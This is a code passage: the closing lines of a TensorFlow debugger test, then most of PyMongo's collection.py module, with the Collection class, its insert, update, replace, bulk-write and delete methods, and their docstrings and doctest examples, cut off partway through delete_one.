b'=02=02=02', tf.compat.as_bytes(tensor_data['tensor_data'][0][1]))
# Get the health pill of a string tensor.
tensor_response = self._serverGet(
'tensor_data',
{'watch_key': 'str1:0:DebugIdentity',
'time_indices': '-1',
'mapping': 'health-pill',
'slicing': ''})
tensor_data = self._deserializeResponse(tensor_response)
self.assertEqual(None, tensor_data['error'])
self.assertEqual([None], tensor_data['tensor_data'])
if __name__ == "__main__":
tf.test.main()
|
collection.py | # Copyright 2009-present MongoDB, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Collection level utilities for Mongo."""
import datetime
import warnings
from bson.code import Code
from bson.objectid import ObjectId
from bson.py3compat import (_unicode,
abc,
integer_types,
string_type)
from bson.raw_bson import RawBSONDocument
from bson.codec_options import CodecOptions
from bson.son import SON
from pymongo import (common,
helpers,
message)
from pymongo.bulk import BulkOperationBuilder, _Bulk
from pymongo.command_cursor import CommandCursor, RawBatchCommandCursor
from pymongo.common import ORDERED_TYPES
from pymongo.collation import validate_collation_or_none
from pymongo.change_stream import CollectionChangeStream
from pymongo.cursor import Cursor, RawBatchCursor
from pymongo.errors import (BulkWriteError,
ConfigurationError,
InvalidName,
OperationFailure)
from pymongo.helpers import (_check_write_command_response,
_raise_last_error)
from pymongo.message import _UNICODE_REPLACE_CODEC_OPTIONS
from pymongo.operations import IndexModel
from pymongo.read_preferences import ReadPreference
from pymongo.results import (BulkWriteResult,
DeleteResult,
InsertOneResult,
InsertManyResult,
UpdateResult)
from pymongo.write_concern import WriteConcern
_NO_OBJ_ERROR = "No matching object found"
_UJOIN = u"%s.%s"
class ReturnDocument(object):
"""An enum used with
:meth:`~pymongo.collection.Collection.find_one_and_replace` and
:meth:`~pymongo.collection.Collection.find_one_and_update`.
"""
BEFORE = False
"""Return the original document before it was updated/replaced, or
``None`` if no document matches the query.
"""
AFTER = True
"""Return the updated/replaced or inserted document."""
class Collection(common.BaseObject):
"""A Mongo collection.
"""
def __init__(self, database, name, create=False, codec_options=None,
read_preference=None, write_concern=None, read_concern=None,
session=None, **kwargs):
"""Get / create a Mongo collection.
Raises :class:`TypeError` if `name` is not an instance of
:class:`basestring` (:class:`str` in python 3). Raises
:class:`~pymongo.errors.InvalidName` if `name` is not a valid
collection name. Any additional keyword arguments will be used
as options passed to the create command. See
:meth:`~pymongo.database.Database.create_collection` for valid
options.
If `create` is ``True``, `collation` is specified, or any additional
keyword arguments are present, a ``create`` command will be
sent, using ``session`` if specified. Otherwise, a ``create`` command
will not be sent and the collection will be created implicitly on first
use. The optional ``session`` argument is *only* used for the ``create``
command; it is not associated with the collection afterward.
:Parameters:
- `database`: the database to get a collection from
- `name`: the name of the collection to get
- `create` (optional): if ``True``, force collection
creation even without options being set
- `codec_options` (optional): An instance of
:class:`~bson.codec_options.CodecOptions`. If ``None`` (the
default) database.codec_options is used.
- `read_preference` (optional): The read preference to use. If
``None`` (the default) database.read_preference is used.
- `write_concern` (optional): An instance of
:class:`~pymongo.write_concern.WriteConcern`. If ``None`` (the
default) database.write_concern is used.
- `read_concern` (optional): An instance of
:class:`~pymongo.read_concern.ReadConcern`. If ``None`` (the
default) database.read_concern is used.
- `collation` (optional): An instance of
:class:`~pymongo.collation.Collation`. If a collation is provided,
it will be passed to the create collection command. This option is
only supported on MongoDB 3.4 and above.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession` that is used with
the create collection command
- `**kwargs` (optional): additional keyword arguments will
be passed as options for the create collection command
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionchanged:: 3.4
Support the `collation` option.
.. versionchanged:: 3.2
Added the read_concern option.
.. versionchanged:: 3.0
Added the codec_options, read_preference, and write_concern options.
Removed the uuid_subtype attribute.
:class:`~pymongo.collection.Collection` no longer returns an
instance of :class:`~pymongo.collection.Collection` for attribute
names with leading underscores. You must use dict-style lookups
instead::
collection['__my_collection__']
Not:
collection.__my_collection__
.. versionchanged:: 2.2
Removed deprecated argument: options
.. versionadded:: 2.1
uuid_subtype attribute
.. mongodoc:: collections
"""
super(Collection, self).__init__(
codec_options or database.codec_options,
read_preference or database.read_preference,
write_concern or database.write_concern,
read_concern or database.read_concern)
if not isinstance(name, string_type):
raise TypeError("name must be an instance "
"of %s" % (string_type.__name__,))
if not name or ".." in name:
raise InvalidName("collection names cannot be empty")
if "$" in name and not (name.startswith("oplog.$main") or
name.startswith("$cmd")):
raise InvalidName("collection names must not "
"contain '$': %r" % name)
if name[0] == "." or name[-1] == ".":
raise InvalidName("collection names must not start "
"or end with '.': %r" % name)
if "\x00" in name:
raise InvalidName("collection names must not contain the "
"null character")
collation = validate_collation_or_none(kwargs.pop('collation', None))
self.__database = database
self.__name = _unicode(name)
self.__full_name = _UJOIN % (self.__database.name, self.__name)
if create or kwargs or collation:
self.__create(kwargs, collation, session)
self.__write_response_codec_options = self.codec_options._replace(
unicode_decode_error_handler='replace',
document_class=dict)
def _socket_for_reads(self, session):
return self.__database.client._socket_for_reads(
self._read_preference_for(session))
def _socket_for_primary_reads(self, session):
read_pref = ((session and session._txn_read_preference())
or ReadPreference.PRIMARY)
return self.__database.client._socket_for_reads(read_pref), read_pref
def _socket_for_writes(self):
return self.__database.client._socket_for_writes()
def _command(self, sock_info, command, slave_ok=False,
read_preference=None,
codec_options=None, check=True, allowable_errors=None,
read_concern=None,
write_concern=None,
collation=None,
session=None,
retryable_write=False):
"""Internal command helper.
:Parameters:
- `sock_info` - A SocketInfo instance.
- `command` - The command itself, as a SON instance.
- `slave_ok`: whether to set the SlaveOkay wire protocol bit.
- `codec_options` (optional) - An instance of
:class:`~bson.codec_options.CodecOptions`.
- `check`: raise OperationFailure if there are errors
- `allowable_errors`: errors to ignore if `check` is True
- `read_concern` (optional) - An instance of
:class:`~pymongo.read_concern.ReadConcern`.
- `write_concern`: An instance of
:class:`~pymongo.write_concern.WriteConcern`. This option is only
valid for MongoDB 3.4 and above.
- `collation` (optional) - An instance of
:class:`~pymongo.collation.Collation`.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
:Returns:
The result document.
"""
with self.__database.client._tmp_session(session) as s:
return sock_info.command(
self.__database.name,
command,
slave_ok,
read_preference or self._read_preference_for(session),
codec_options or self.codec_options,
check,
allowable_errors,
read_concern=read_concern,
write_concern=write_concern,
parse_write_concern_error=True,
collation=collation,
session=s,
client=self.__database.client,
retryable_write=retryable_write)
def __create(self, options, collation, session):
"""Sends a create command with the given options.
"""
cmd = SON([("create", self.__name)])
if options:
if "size" in options:
options["size"] = float(options["size"])
cmd.update(options)
with self._socket_for_writes() as sock_info:
self._command(
sock_info, cmd, read_preference=ReadPreference.PRIMARY,
write_concern=self._write_concern_for(session),
collation=collation, session=session)
def __getattr__(self, name):
"""Get a sub-collection of this collection by name.
Raises InvalidName if an invalid collection name is used.
:Parameters:
- `name`: the name of the collection to get
"""
if name.startswith('_'):
full_name = _UJOIN % (self.__name, name)
raise AttributeError(
"Collection has no attribute %r. To access the %s"
" collection, use database['%s']." % (
name, full_name, full_name))
return self.__getitem__(name)
def __getitem__(self, name):
return Collection(self.__database,
_UJOIN % (self.__name, name),
False,
self.codec_options,
self.read_preference,
self.write_concern,
self.read_concern)
def __repr__(self):
return "Collection(%r, %r)" % (self.__database, self.__name)
def __eq__(self, other):
if isinstance(other, Collection):
return (self.__database == other.database and
self.__name == other.name)
return NotImplemented
def __ne__(self, other):
return not self == other
@property
def full_name(self):
"""The full name of this :class:`Collection`.
The full name is of the form `database_name.collection_name`.
"""
return self.__full_name
@property
def name(self):
"""The name of this :class:`Collection`."""
return self.__name
@property
def database(self):
"""The :class:`~pymongo.database.Database` that this
:class:`Collection` is a part of.
"""
return self.__database
def with_options(
self, codec_options=None, read_preference=None,
write_concern=None, read_concern=None):
"""Get a clone of this collection changing the specified settings.
>>> coll1.read_preference
Primary()
>>> from pymongo import ReadPreference
>>> coll2 = coll1.with_options(read_preference=ReadPreference.SECONDARY)
>>> coll1.read_preference
Primary()
>>> coll2.read_preference
Secondary(tag_sets=None)
:Parameters:
- `codec_options` (optional): An instance of
:class:`~bson.codec_options.CodecOptions`. If ``None`` (the
default) the :attr:`codec_options` of this :class:`Collection`
is used.
- `read_preference` (optional): The read preference to use. If
``None`` (the default) the :attr:`read_preference` of this
:class:`Collection` is used. See :mod:`~pymongo.read_preferences`
for options.
- `write_concern` (optional): An instance of
:class:`~pymongo.write_concern.WriteConcern`. If ``None`` (the
default) the :attr:`write_concern` of this :class:`Collection`
is used.
- `read_concern` (optional): An instance of
:class:`~pymongo.read_concern.ReadConcern`. If ``None`` (the
default) the :attr:`read_concern` of this :class:`Collection`
is used.
"""
return Collection(self.__database,
self.__name,
False,
codec_options or self.codec_options,
read_preference or self.read_preference,
write_concern or self.write_concern,
read_concern or self.read_concern)
def initialize_unordered_bulk_op(self, bypass_document_validation=False):
"""**DEPRECATED** - Initialize an unordered batch of write operations.
Operations will be performed on the server in arbitrary order,
possibly in parallel. All operations will be attempted.
:Parameters:
- `bypass_document_validation`: (optional) If ``True``, allows the
write to opt-out of document level validation. Default is
``False``.
Returns a :class:`~pymongo.bulk.BulkOperationBuilder` instance.
See :ref:`unordered_bulk` for examples.
.. note:: `bypass_document_validation` requires server version
**>= 3.2**
.. versionchanged:: 3.5
Deprecated. Use :meth:`~pymongo.collection.Collection.bulk_write`
instead.
.. versionchanged:: 3.2
Added bypass_document_validation support
.. versionadded:: 2.7
"""
warnings.warn("initialize_unordered_bulk_op is deprecated",
DeprecationWarning, stacklevel=2)
return BulkOperationBuilder(self, False, bypass_document_validation)
def initialize_ordered_bulk_op(self, bypass_document_validation=False):
"""**DEPRECATED** - Initialize an ordered batch of write operations.
Operations will be performed on the server serially, in the
order provided. If an error occurs all remaining operations
are aborted.
:Parameters:
- `bypass_document_validation`: (optional) If ``True``, allows the
write to opt-out of document level validation. Default is
``False``.
Returns a :class:`~pymongo.bulk.BulkOperationBuilder` instance.
See :ref:`ordered_bulk` for examples.
.. note:: `bypass_document_validation` requires server version
**>= 3.2**
.. versionchanged:: 3.5
Deprecated. Use :meth:`~pymongo.collection.Collection.bulk_write`
instead.
.. versionchanged:: 3.2
Added bypass_document_validation support
.. versionadded:: 2.7
"""
warnings.warn("initialize_ordered_bulk_op is deprecated",
DeprecationWarning, stacklevel=2)
return BulkOperationBuilder(self, True, bypass_document_validation)
def bulk_write(self, requests, ordered=True,
bypass_document_validation=False, session=None):
"""Send a batch of write operations to the server.
Requests are passed as a list of write operation instances (
:class:`~pymongo.operations.InsertOne`,
:class:`~pymongo.operations.UpdateOne`,
:class:`~pymongo.operations.UpdateMany`,
:class:`~pymongo.operations.ReplaceOne`,
:class:`~pymongo.operations.DeleteOne`, or
:class:`~pymongo.operations.DeleteMany`).
>>> for doc in db.test.find({}):
... print(doc)
...
{u'x': 1, u'_id': ObjectId('54f62e60fba5226811f634ef')}
{u'x': 1, u'_id': ObjectId('54f62e60fba5226811f634f0')}
>>> # DeleteMany, UpdateOne, and UpdateMany are also available.
...
>>> from pymongo import InsertOne, DeleteOne, ReplaceOne
>>> requests = [InsertOne({'y': 1}), DeleteOne({'x': 1}),
... ReplaceOne({'w': 1}, {'z': 1}, upsert=True)]
>>> result = db.test.bulk_write(requests)
>>> result.inserted_count
1
>>> result.deleted_count
1
>>> result.modified_count
0
>>> result.upserted_ids
{2: ObjectId('54f62ee28891e756a6e1abd5')}
>>> for doc in db.test.find({}):
... print(doc)
...
{u'x': 1, u'_id': ObjectId('54f62e60fba5226811f634f0')}
{u'y': 1, u'_id': ObjectId('54f62ee2fba5226811f634f1')}
{u'z': 1, u'_id': ObjectId('54f62ee28891e756a6e1abd5')}
:Parameters:
- `requests`: A list of write operations (see examples above).
- `ordered` (optional): If ``True`` (the default) requests will be
performed on the server serially, in the order provided. If an error
occurs all remaining operations are aborted. If ``False`` requests
will be performed on the server in arbitrary order, possibly in
parallel, and all operations will be attempted.
- `bypass_document_validation`: (optional) If ``True``, allows the
write to opt-out of document level validation. Default is
``False``.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
:Returns:
An instance of :class:`~pymongo.results.BulkWriteResult`.
.. seealso:: :ref:`writes-and-ids`
.. note:: `bypass_document_validation` requires server version
**>= 3.2**
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionchanged:: 3.2
Added bypass_document_validation support
.. versionadded:: 3.0
"""
common.validate_list("requests", requests)
blk = _Bulk(self, ordered, bypass_document_validation)
for request in requests:
try:
request._add_to_bulk(blk)
except AttributeError:
raise TypeError("%r is not a valid request" % (request,))
write_concern = self._write_concern_for(session)
bulk_api_result = blk.execute(write_concern, session)
if bulk_api_result is not None:
return BulkWriteResult(bulk_api_result, True)
return BulkWriteResult({}, False)
def _legacy_write(self, sock_info, name, cmd, op_id,
bypass_doc_val, func, *args):
"""Internal legacy unacknowledged write helper."""
# Cannot have both unacknowledged write and bypass document validation.
if bypass_doc_val and sock_info.max_wire_version >= 4:
raise OperationFailure("Cannot set bypass_document_validation with"
" unacknowledged write concern")
listeners = self.database.client._event_listeners
publish = listeners.enabled_for_commands
if publish:
start = datetime.datetime.now()
args = args + (sock_info.compression_context,)
rqst_id, msg, max_size = func(*args)
if publish:
duration = datetime.datetime.now() - start
listeners.publish_command_start(
cmd, self.__database.name, rqst_id, sock_info.address, op_id)
start = datetime.datetime.now()
try:
result = sock_info.legacy_write(rqst_id, msg, max_size, False)
except Exception as exc:
if publish:
dur = (datetime.datetime.now() - start) + duration
if isinstance(exc, OperationFailure):
details = exc.details
# Succeed if GLE was successful and this is a write error.
if details.get("ok") and "n" in details:
reply = message._convert_write_result(
name, cmd, details)
listeners.publish_command_success(
dur, reply, name, rqst_id, sock_info.address, op_id)
raise
else:
details = message._convert_exception(exc)
listeners.publish_command_failure(
dur, details, name, rqst_id, sock_info.address, op_id)
raise
if publish:
if result is not None:
reply = message._convert_write_result(name, cmd, result)
else:
# Comply with APM spec.
reply = {'ok': 1}
duration = (datetime.datetime.now() - start) + duration
listeners.publish_command_success(
duration, reply, name, rqst_id, sock_info.address, op_id)
return result
def _insert_one(
self, doc, ordered,
check_keys, manipulate, write_concern, op_id, bypass_doc_val,
session):
"""Internal helper for inserting a single document."""
if manipulate:
doc = self.__database._apply_incoming_manipulators(doc, self)
if not isinstance(doc, RawBSONDocument) and '_id' not in doc:
doc['_id'] = ObjectId()
doc = self.__database._apply_incoming_copying_manipulators(doc,
self)
write_concern = write_concern or self.write_concern
acknowledged = write_concern.acknowledged
command = SON([('insert', self.name),
('ordered', ordered),
('documents', [doc])])
if not write_concern.is_server_default:
command['writeConcern'] = write_concern.document
def _insert_command(session, sock_info, retryable_write):
if not sock_info.op_msg_enabled and not acknowledged:
# Legacy OP_INSERT.
return self._legacy_write(
sock_info, 'insert', command, op_id,
bypass_doc_val, message.insert, self.__full_name,
[doc], check_keys, False, write_concern.document, False,
self.__write_response_codec_options)
if bypass_doc_val and sock_info.max_wire_version >= 4:
command['bypassDocumentValidation'] = True
result = sock_info.command(
self.__database.name,
command,
write_concern=write_concern,
codec_options=self.__write_response_codec_options,
check_keys=check_keys,
session=session,
client=self.__database.client,
retryable_write=retryable_write)
_check_write_command_response(result)
self.__database.client._retryable_write(
acknowledged, _insert_command, session)
if not isinstance(doc, RawBSONDocument):
return doc.get('_id')
def _insert(self, docs, ordered=True, check_keys=True,
manipulate=False, write_concern=None, op_id=None,
bypass_doc_val=False, session=None):
"""Internal insert helper."""
if isinstance(docs, abc.Mapping):
return self._insert_one(
docs, ordered, check_keys, manipulate, write_concern, op_id,
bypass_doc_val, session)
ids = []
if manipulate:
def gen():
"""Generator that applies SON manipulators to each document
and adds _id if necessary.
"""
_db = self.__database
for doc in docs:
# Apply user-configured SON manipulators. This order of
# operations is required for backwards compatibility,
# see PYTHON-709.
doc = _db._apply_incoming_manipulators(doc, self)
if not (isinstance(doc, RawBSONDocument) or '_id' in doc):
doc['_id'] = ObjectId()
doc = _db._apply_incoming_copying_manipulators(doc, self)
ids.append(doc['_id'])
yield doc
else:
def gen():
"""Generator that only tracks existing _ids."""
for doc in docs:
# Don't inflate RawBSONDocument by touching fields.
if not isinstance(doc, RawBSONDocument):
ids.append(doc.get('_id'))
yield doc
write_concern = write_concern or self._write_concern_for(session)
blk = _Bulk(self, ordered, bypass_doc_val)
blk.ops = [(message._INSERT, doc) for doc in gen()]
try:
blk.execute(write_concern, session=session)
except BulkWriteError as bwe:
_raise_last_error(bwe.details)
return ids
def insert_one(self, document, bypass_document_validation=False,
session=None):
"""Insert a single document.
>>> db.test.count_documents({'x': 1})
0
>>> result = db.test.insert_one({'x': 1})
>>> result.inserted_id
ObjectId('54f112defba522406c9cc208')
>>> db.test.find_one({'x': 1})
{u'x': 1, u'_id': ObjectId('54f112defba522406c9cc208')}
:Parameters:
- `document`: The document to insert. Must be a mutable mapping
type. If the document does not have an _id field one will be
added automatically.
- `bypass_document_validation`: (optional) If ``True``, allows the
write to opt-out of document level validation. Default is
``False``.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
:Returns:
- An instance of :class:`~pymongo.results.InsertOneResult`.
.. seealso:: :ref:`writes-and-ids`
.. note:: `bypass_document_validation` requires server version
**>= 3.2**
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionchanged:: 3.2
Added bypass_document_validation support
.. versionadded:: 3.0
"""
common.validate_is_document_type("document", document)
if not (isinstance(document, RawBSONDocument) or "_id" in document):
document["_id"] = ObjectId()
write_concern = self._write_concern_for(session)
return InsertOneResult(
self._insert(document,
write_concern=write_concern,
bypass_doc_val=bypass_document_validation,
session=session),
write_concern.acknowledged)
def insert_many(self, documents, ordered=True,
bypass_document_validation=False, session=None):
"""Insert an iterable of documents.
>>> db.test.count_documents({})
0
>>> result = db.test.insert_many([{'x': i} for i in range(2)])
>>> result.inserted_ids
[ObjectId('54f113fffba522406c9cc20e'), ObjectId('54f113fffba522406c9cc20f')]
>>> db.test.count_documents({})
2
:Parameters:
- `documents`: An iterable of documents to insert.
- `ordered` (optional): If ``True`` (the default) documents will be
inserted on the server serially, in the order provided. If an error
occurs all remaining inserts are aborted. If ``False``, documents
will be inserted on the server in arbitrary order, possibly in
parallel, and all document inserts will be attempted.
- `bypass_document_validation`: (optional) If ``True``, allows the
write to opt-out of document level validation. Default is
``False``.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
:Returns:
An instance of :class:`~pymongo.results.InsertManyResult`.
.. seealso:: :ref:`writes-and-ids`
.. note:: `bypass_document_validation` requires server version
**>= 3.2**
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionchanged:: 3.2
Added bypass_document_validation support
.. versionadded:: 3.0
"""
if not isinstance(documents, abc.Iterable) or not documents:
raise TypeError("documents must be a non-empty list")
inserted_ids = []
def gen():
"""A generator that validates documents and handles _ids."""
for document in documents:
common.validate_is_document_type("document", document)
if not isinstance(document, RawBSONDocument):
if "_id" not in document:
document["_id"] = ObjectId()
inserted_ids.append(document["_id"])
yield (message._INSERT, document)
write_concern = self._write_concern_for(session)
blk = _Bulk(self, ordered, bypass_document_validation)
blk.ops = [doc for doc in gen()]
blk.execute(write_concern, session=session)
return InsertManyResult(inserted_ids, write_concern.acknowledged)
def _update(self, sock_info, criteria, document, upsert=False,
check_keys=True, multi=False, manipulate=False,
write_concern=None, op_id=None, ordered=True,
bypass_doc_val=False, collation=None, array_filters=None,
session=None, retryable_write=False):
"""Internal update / replace helper."""
common.validate_boolean("upsert", upsert)
if manipulate:
document = self.__database._fix_incoming(document, self)
collation = validate_collation_or_none(collation)
write_concern = write_concern or self.write_concern
acknowledged = write_concern.acknowledged
update_doc = SON([('q', criteria),
('u', document),
('multi', multi),
('upsert', upsert)])
if collation is not None:
if sock_info.max_wire_version < 5:
raise ConfigurationError(
'Must be connected to MongoDB 3.4+ to use collations.')
elif not acknowledged:
raise ConfigurationError(
'Collation is unsupported for unacknowledged writes.')
else:
update_doc['collation'] = collation
if array_filters is not None:
if sock_info.max_wire_version < 6:
raise ConfigurationError(
'Must be connected to MongoDB 3.6+ to use array_filters.')
elif not acknowledged:
raise ConfigurationError(
'arrayFilters is unsupported for unacknowledged writes.')
else:
update_doc['arrayFilters'] = array_filters
command = SON([('update', self.name),
('ordered', ordered),
('updates', [update_doc])])
if not write_concern.is_server_default:
command['writeConcern'] = write_concern.document
if not sock_info.op_msg_enabled and not acknowledged:
# Legacy OP_UPDATE.
return self._legacy_write(
sock_info, 'update', command, op_id,
bypass_doc_val, message.update, self.__full_name, upsert,
multi, criteria, document, False, write_concern.document,
check_keys, self.__write_response_codec_options)
# Update command.
if bypass_doc_val and sock_info.max_wire_version >= 4:
command['bypassDocumentValidation'] = True
# The command result has to be published for APM unmodified
# so we make a shallow copy here before adding updatedExisting.
result = sock_info.command(
self.__database.name,
command,
write_concern=write_concern,
codec_options=self.__write_response_codec_options,
session=session,
client=self.__database.client,
retryable_write=retryable_write).copy()
_check_write_command_response(result)
# Add the updatedExisting field for compatibility.
if result.get('n') and 'upserted' not in result:
result['updatedExisting'] = True
else:
result['updatedExisting'] = False
# MongoDB >= 2.6.0 returns the upsert _id in an array
# element. Break it out for backward compatibility.
if 'upserted' in result:
result['upserted'] = result['upserted'][0]['_id']
if not acknowledged:
return None
return result
def _update_retryable(
self, criteria, document, upsert=False,
check_keys=True, multi=False, manipulate=False,
write_concern=None, op_id=None, ordered=True,
bypass_doc_val=False, collation=None, array_filters=None,
session=None):
"""Internal update / replace helper."""
def _update(session, sock_info, retryable_write):
return self._update(
sock_info, criteria, document, upsert=upsert,
check_keys=check_keys, multi=multi, manipulate=manipulate,
write_concern=write_concern, op_id=op_id, ordered=ordered,
bypass_doc_val=bypass_doc_val, collation=collation,
array_filters=array_filters, session=session,
retryable_write=retryable_write)
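# Only acknowledged, single-document updates are eligible for retry;
# multi-document updates are excluded, hence ``and not multi`` below.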
return self.__database.client._retryable_write(
(write_concern or self.write_concern).acknowledged and not multi,
_update, session)
def replace_one(self, filter, replacement, upsert=False,
bypass_document_validation=False, collation=None,
session=None):
"""Replace a single document matching the filter.
>>> for doc in db.test.find({}):
... print(doc)
...
{u'x': 1, u'_id': ObjectId('54f4c5befba5220aa4d6dee7')}
>>> result = db.test.replace_one({'x': 1}, {'y': 1})
>>> result.matched_count
1
>>> result.modified_count
1
>>> for doc in db.test.find({}):
... print(doc)
...
{u'y': 1, u'_id': ObjectId('54f4c5befba5220aa4d6dee7')}
The *upsert* option can be used to insert a new document if a matching
document does not exist.
>>> result = db.test.replace_one({'x': 1}, {'x': 1}, True)
>>> result.matched_count
0
>>> result.modified_count
0
>>> result.upserted_id
ObjectId('54f11e5c8891e756a6e1abd4')
>>> db.test.find_one({'x': 1})
{u'x': 1, u'_id': ObjectId('54f11e5c8891e756a6e1abd4')}
:Parameters:
- `filter`: A query that matches the document to replace.
- `replacement`: The new document.
- `upsert` (optional): If ``True``, perform an insert if no documents
match the filter.
- `bypass_document_validation`: (optional) If ``True``, allows the
write to opt-out of document level validation. Default is
``False``.
- `collation` (optional): An instance of
:class:`~pymongo.collation.Collation`. This option is only supported
on MongoDB 3.4 and above.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
:Returns:
- An instance of :class:`~pymongo.results.UpdateResult`.
.. note:: `bypass_document_validation` requires server version
**>= 3.2**
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionchanged:: 3.4
Added the `collation` option.
.. versionchanged:: 3.2
Added bypass_document_validation support
.. versionadded:: 3.0
"""
common.validate_is_mapping("filter", filter)
common.validate_ok_for_replace(replacement)
write_concern = self._write_concern_for(session)
return UpdateResult(
self._update_retryable(
filter, replacement, upsert,
write_concern=write_concern,
bypass_doc_val=bypass_document_validation,
collation=collation, session=session),
write_concern.acknowledged)
def update_one(self, filter, update, upsert=False,
bypass_document_validation=False,
collation=None, array_filters=None, session=None):
"""Update a single document matching the filter.
>>> for doc in db.test.find():
... print(doc)
...
{u'x': 1, u'_id': 0}
{u'x': 1, u'_id': 1}
{u'x': 1, u'_id': 2}
>>> result = db.test.update_one({'x': 1}, {'$inc': {'x': 3}})
>>> result.matched_count
1
>>> result.modified_count
1
>>> for doc in db.test.find():
... print(doc)
...
{u'x': 4, u'_id': 0}
{u'x': 1, u'_id': 1}
{u'x': 1, u'_id': 2}
:Parameters:
- `filter`: A query that matches the document to update.
- `update`: The modifications to apply.
- `upsert` (optional): If ``True``, perform an insert if no documents
match the filter.
- `bypass_document_validation`: (optional) If ``True``, allows the
write to opt-out of document level validation. Default is
``False``.
- `collation` (optional): An instance of
:class:`~pymongo.collation.Collation`. This option is only supported
on MongoDB 3.4 and above.
- `array_filters` (optional): A list of filters specifying which
array elements an update should apply to. Requires MongoDB 3.6+.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
:Returns:
- An instance of :class:`~pymongo.results.UpdateResult`.
.. note:: `bypass_document_validation` requires server version
**>= 3.2**
.. versionchanged:: 3.6
Added the `array_filters` and ``session`` parameters.
.. versionchanged:: 3.4
Added the `collation` option.
.. versionchanged:: 3.2
Added bypass_document_validation support
.. versionadded:: 3.0
"""
common.validate_is_mapping("filter", filter)
common.validate_ok_for_update(update)
common.validate_list_or_none('array_filters', array_filters)
write_concern = self._write_concern_for(session)
return UpdateResult(
self._update_retryable(
filter, update, upsert, check_keys=False,
write_concern=write_concern,
bypass_doc_val=bypass_document_validation,
collation=collation, array_filters=array_filters,
session=session),
write_concern.acknowledged)
def update_many(self, filter, update, upsert=False, array_filters=None,
bypass_document_validation=False, collation=None,
session=None):
"""Update one or more documents that match the filter.
>>> for doc in db.test.find():
... print(doc)
...
{u'x': 1, u'_id': 0}
{u'x': 1, u'_id': 1}
{u'x': 1, u'_id': 2}
>>> result = db.test.update_many({'x': 1}, {'$inc': {'x': 3}})
>>> result.matched_count
3
>>> result.modified_count
3
>>> for doc in db.test.find():
... print(doc)
...
{u'x': 4, u'_id': 0}
{u'x': 4, u'_id': 1}
{u'x': 4, u'_id': 2}
:Parameters:
- `filter`: A query that matches the documents to update.
- `update`: The modifications to apply.
- `upsert` (optional): If ``True``, perform an insert if no documents
match the filter.
- `bypass_document_validation` (optional): If ``True``, allows the
write to opt-out of document level validation. Default is
``False``.
- `collation` (optional): An instance of
:class:`~pymongo.collation.Collation`. This option is only supported
on MongoDB 3.4 and above.
- `array_filters` (optional): A list of filters specifying which
array elements an update should apply to. Requires MongoDB 3.6+.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
:Returns:
- An instance of :class:`~pymongo.results.UpdateResult`.
.. note:: `bypass_document_validation` requires server version
**>= 3.2**
.. versionchanged:: 3.6
Added ``array_filters`` and ``session`` parameters.
.. versionchanged:: 3.4
Added the `collation` option.
.. versionchanged:: 3.2
Added bypass_document_validation support
.. versionadded:: 3.0
"""
common.validate_is_mapping("filter", filter)
common.validate_ok_for_update(update)
common.validate_list_or_none('array_filters', array_filters)
write_concern = self._write_concern_for(session)
return UpdateResult(
self._update_retryable(
filter, update, upsert, check_keys=False, multi=True,
write_concern=write_concern,
bypass_doc_val=bypass_document_validation,
collation=collation, array_filters=array_filters,
session=session),
write_concern.acknowledged)
def drop(self, session=None):
"""Alias for :meth:`~pymongo.database.Database.drop_collection`.
:Parameters:
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
The following two calls are equivalent:
>>> db.foo.drop()
>>> db.drop_collection("foo")
.. versionchanged:: 3.7
:meth:`drop` now respects this :class:`Collection`'s :attr:`write_concern`.
.. versionchanged:: 3.6
Added ``session`` parameter.
"""
dbo = self.__database.client.get_database(
self.__database.name,
self.codec_options,
self.read_preference,
self.write_concern,
self.read_concern)
dbo.drop_collection(self.__name, session=session)
def _delete(
self, sock_info, criteria, multi,
write_concern=None, op_id=None, ordered=True,
collation=None, session=None, retryable_write=False):
"""Internal delete helper."""
common.validate_is_mapping("filter", criteria)
write_concern = write_concern or self.write_concern
acknowledged = write_concern.acknowledged
delete_doc = SON([('q', criteria),
('limit', int(not multi))])
collation = validate_collation_or_none(collation)
if collation is not None:
if sock_info.max_wire_version < 5:
raise ConfigurationError(
'Must be connected to MongoDB 3.4+ to use collations.')
elif not acknowledged:
raise ConfigurationError(
'Collation is unsupported for unacknowledged writes.')
else:
delete_doc['collation'] = collation
command = SON([('delete', self.name),
('ordered', ordered),
('deletes', [delete_doc])])
if not write_concern.is_server_default:
command['writeConcern'] = write_concern.document
if not sock_info.op_msg_enabled and not acknowledged:
# Legacy OP_DELETE.
return self._legacy_write(
sock_info, 'delete', command, op_id,
False, message.delete, self.__full_name, criteria,
False, write_concern.document,
self.__write_response_codec_options,
int(not multi))
# Delete command.
result = sock_info.command(
self.__database.name,
command,
write_concern=write_concern,
codec_options=self.__write_response_codec_options,
session=session,
client=self.__database.client,
retryable_write=retryable_write)
_check_write_command_response(result)
return result
def _delete_retryable(
self, criteria, multi,
write_concern=None, op_id=None, ordered=True,
collation=None, session=None):
"""Internal delete helper."""
def _delete(session, sock_info, retryable_write):
return self._delete(
sock_info, criteria, multi,
write_concern=write_concern, op_id=op_id, ordered=ordered,
collation=collation, session=session,
retryable_write=retryable_write)
return self.__database.client._retryable_write(
(write_concern or self.write_concern).acknowledged and not multi,
_delete, session)
def delete_one(self, filter, collation=None, session=None):
"""Delete a single document matching the filter.
>>> db.test.count_documents({'x': 1})
3
>>> result = db.test.delete_one({'x': 1})
>>> result.deleted_count
1
>>> db.test.count_documents({'x': 1})
2
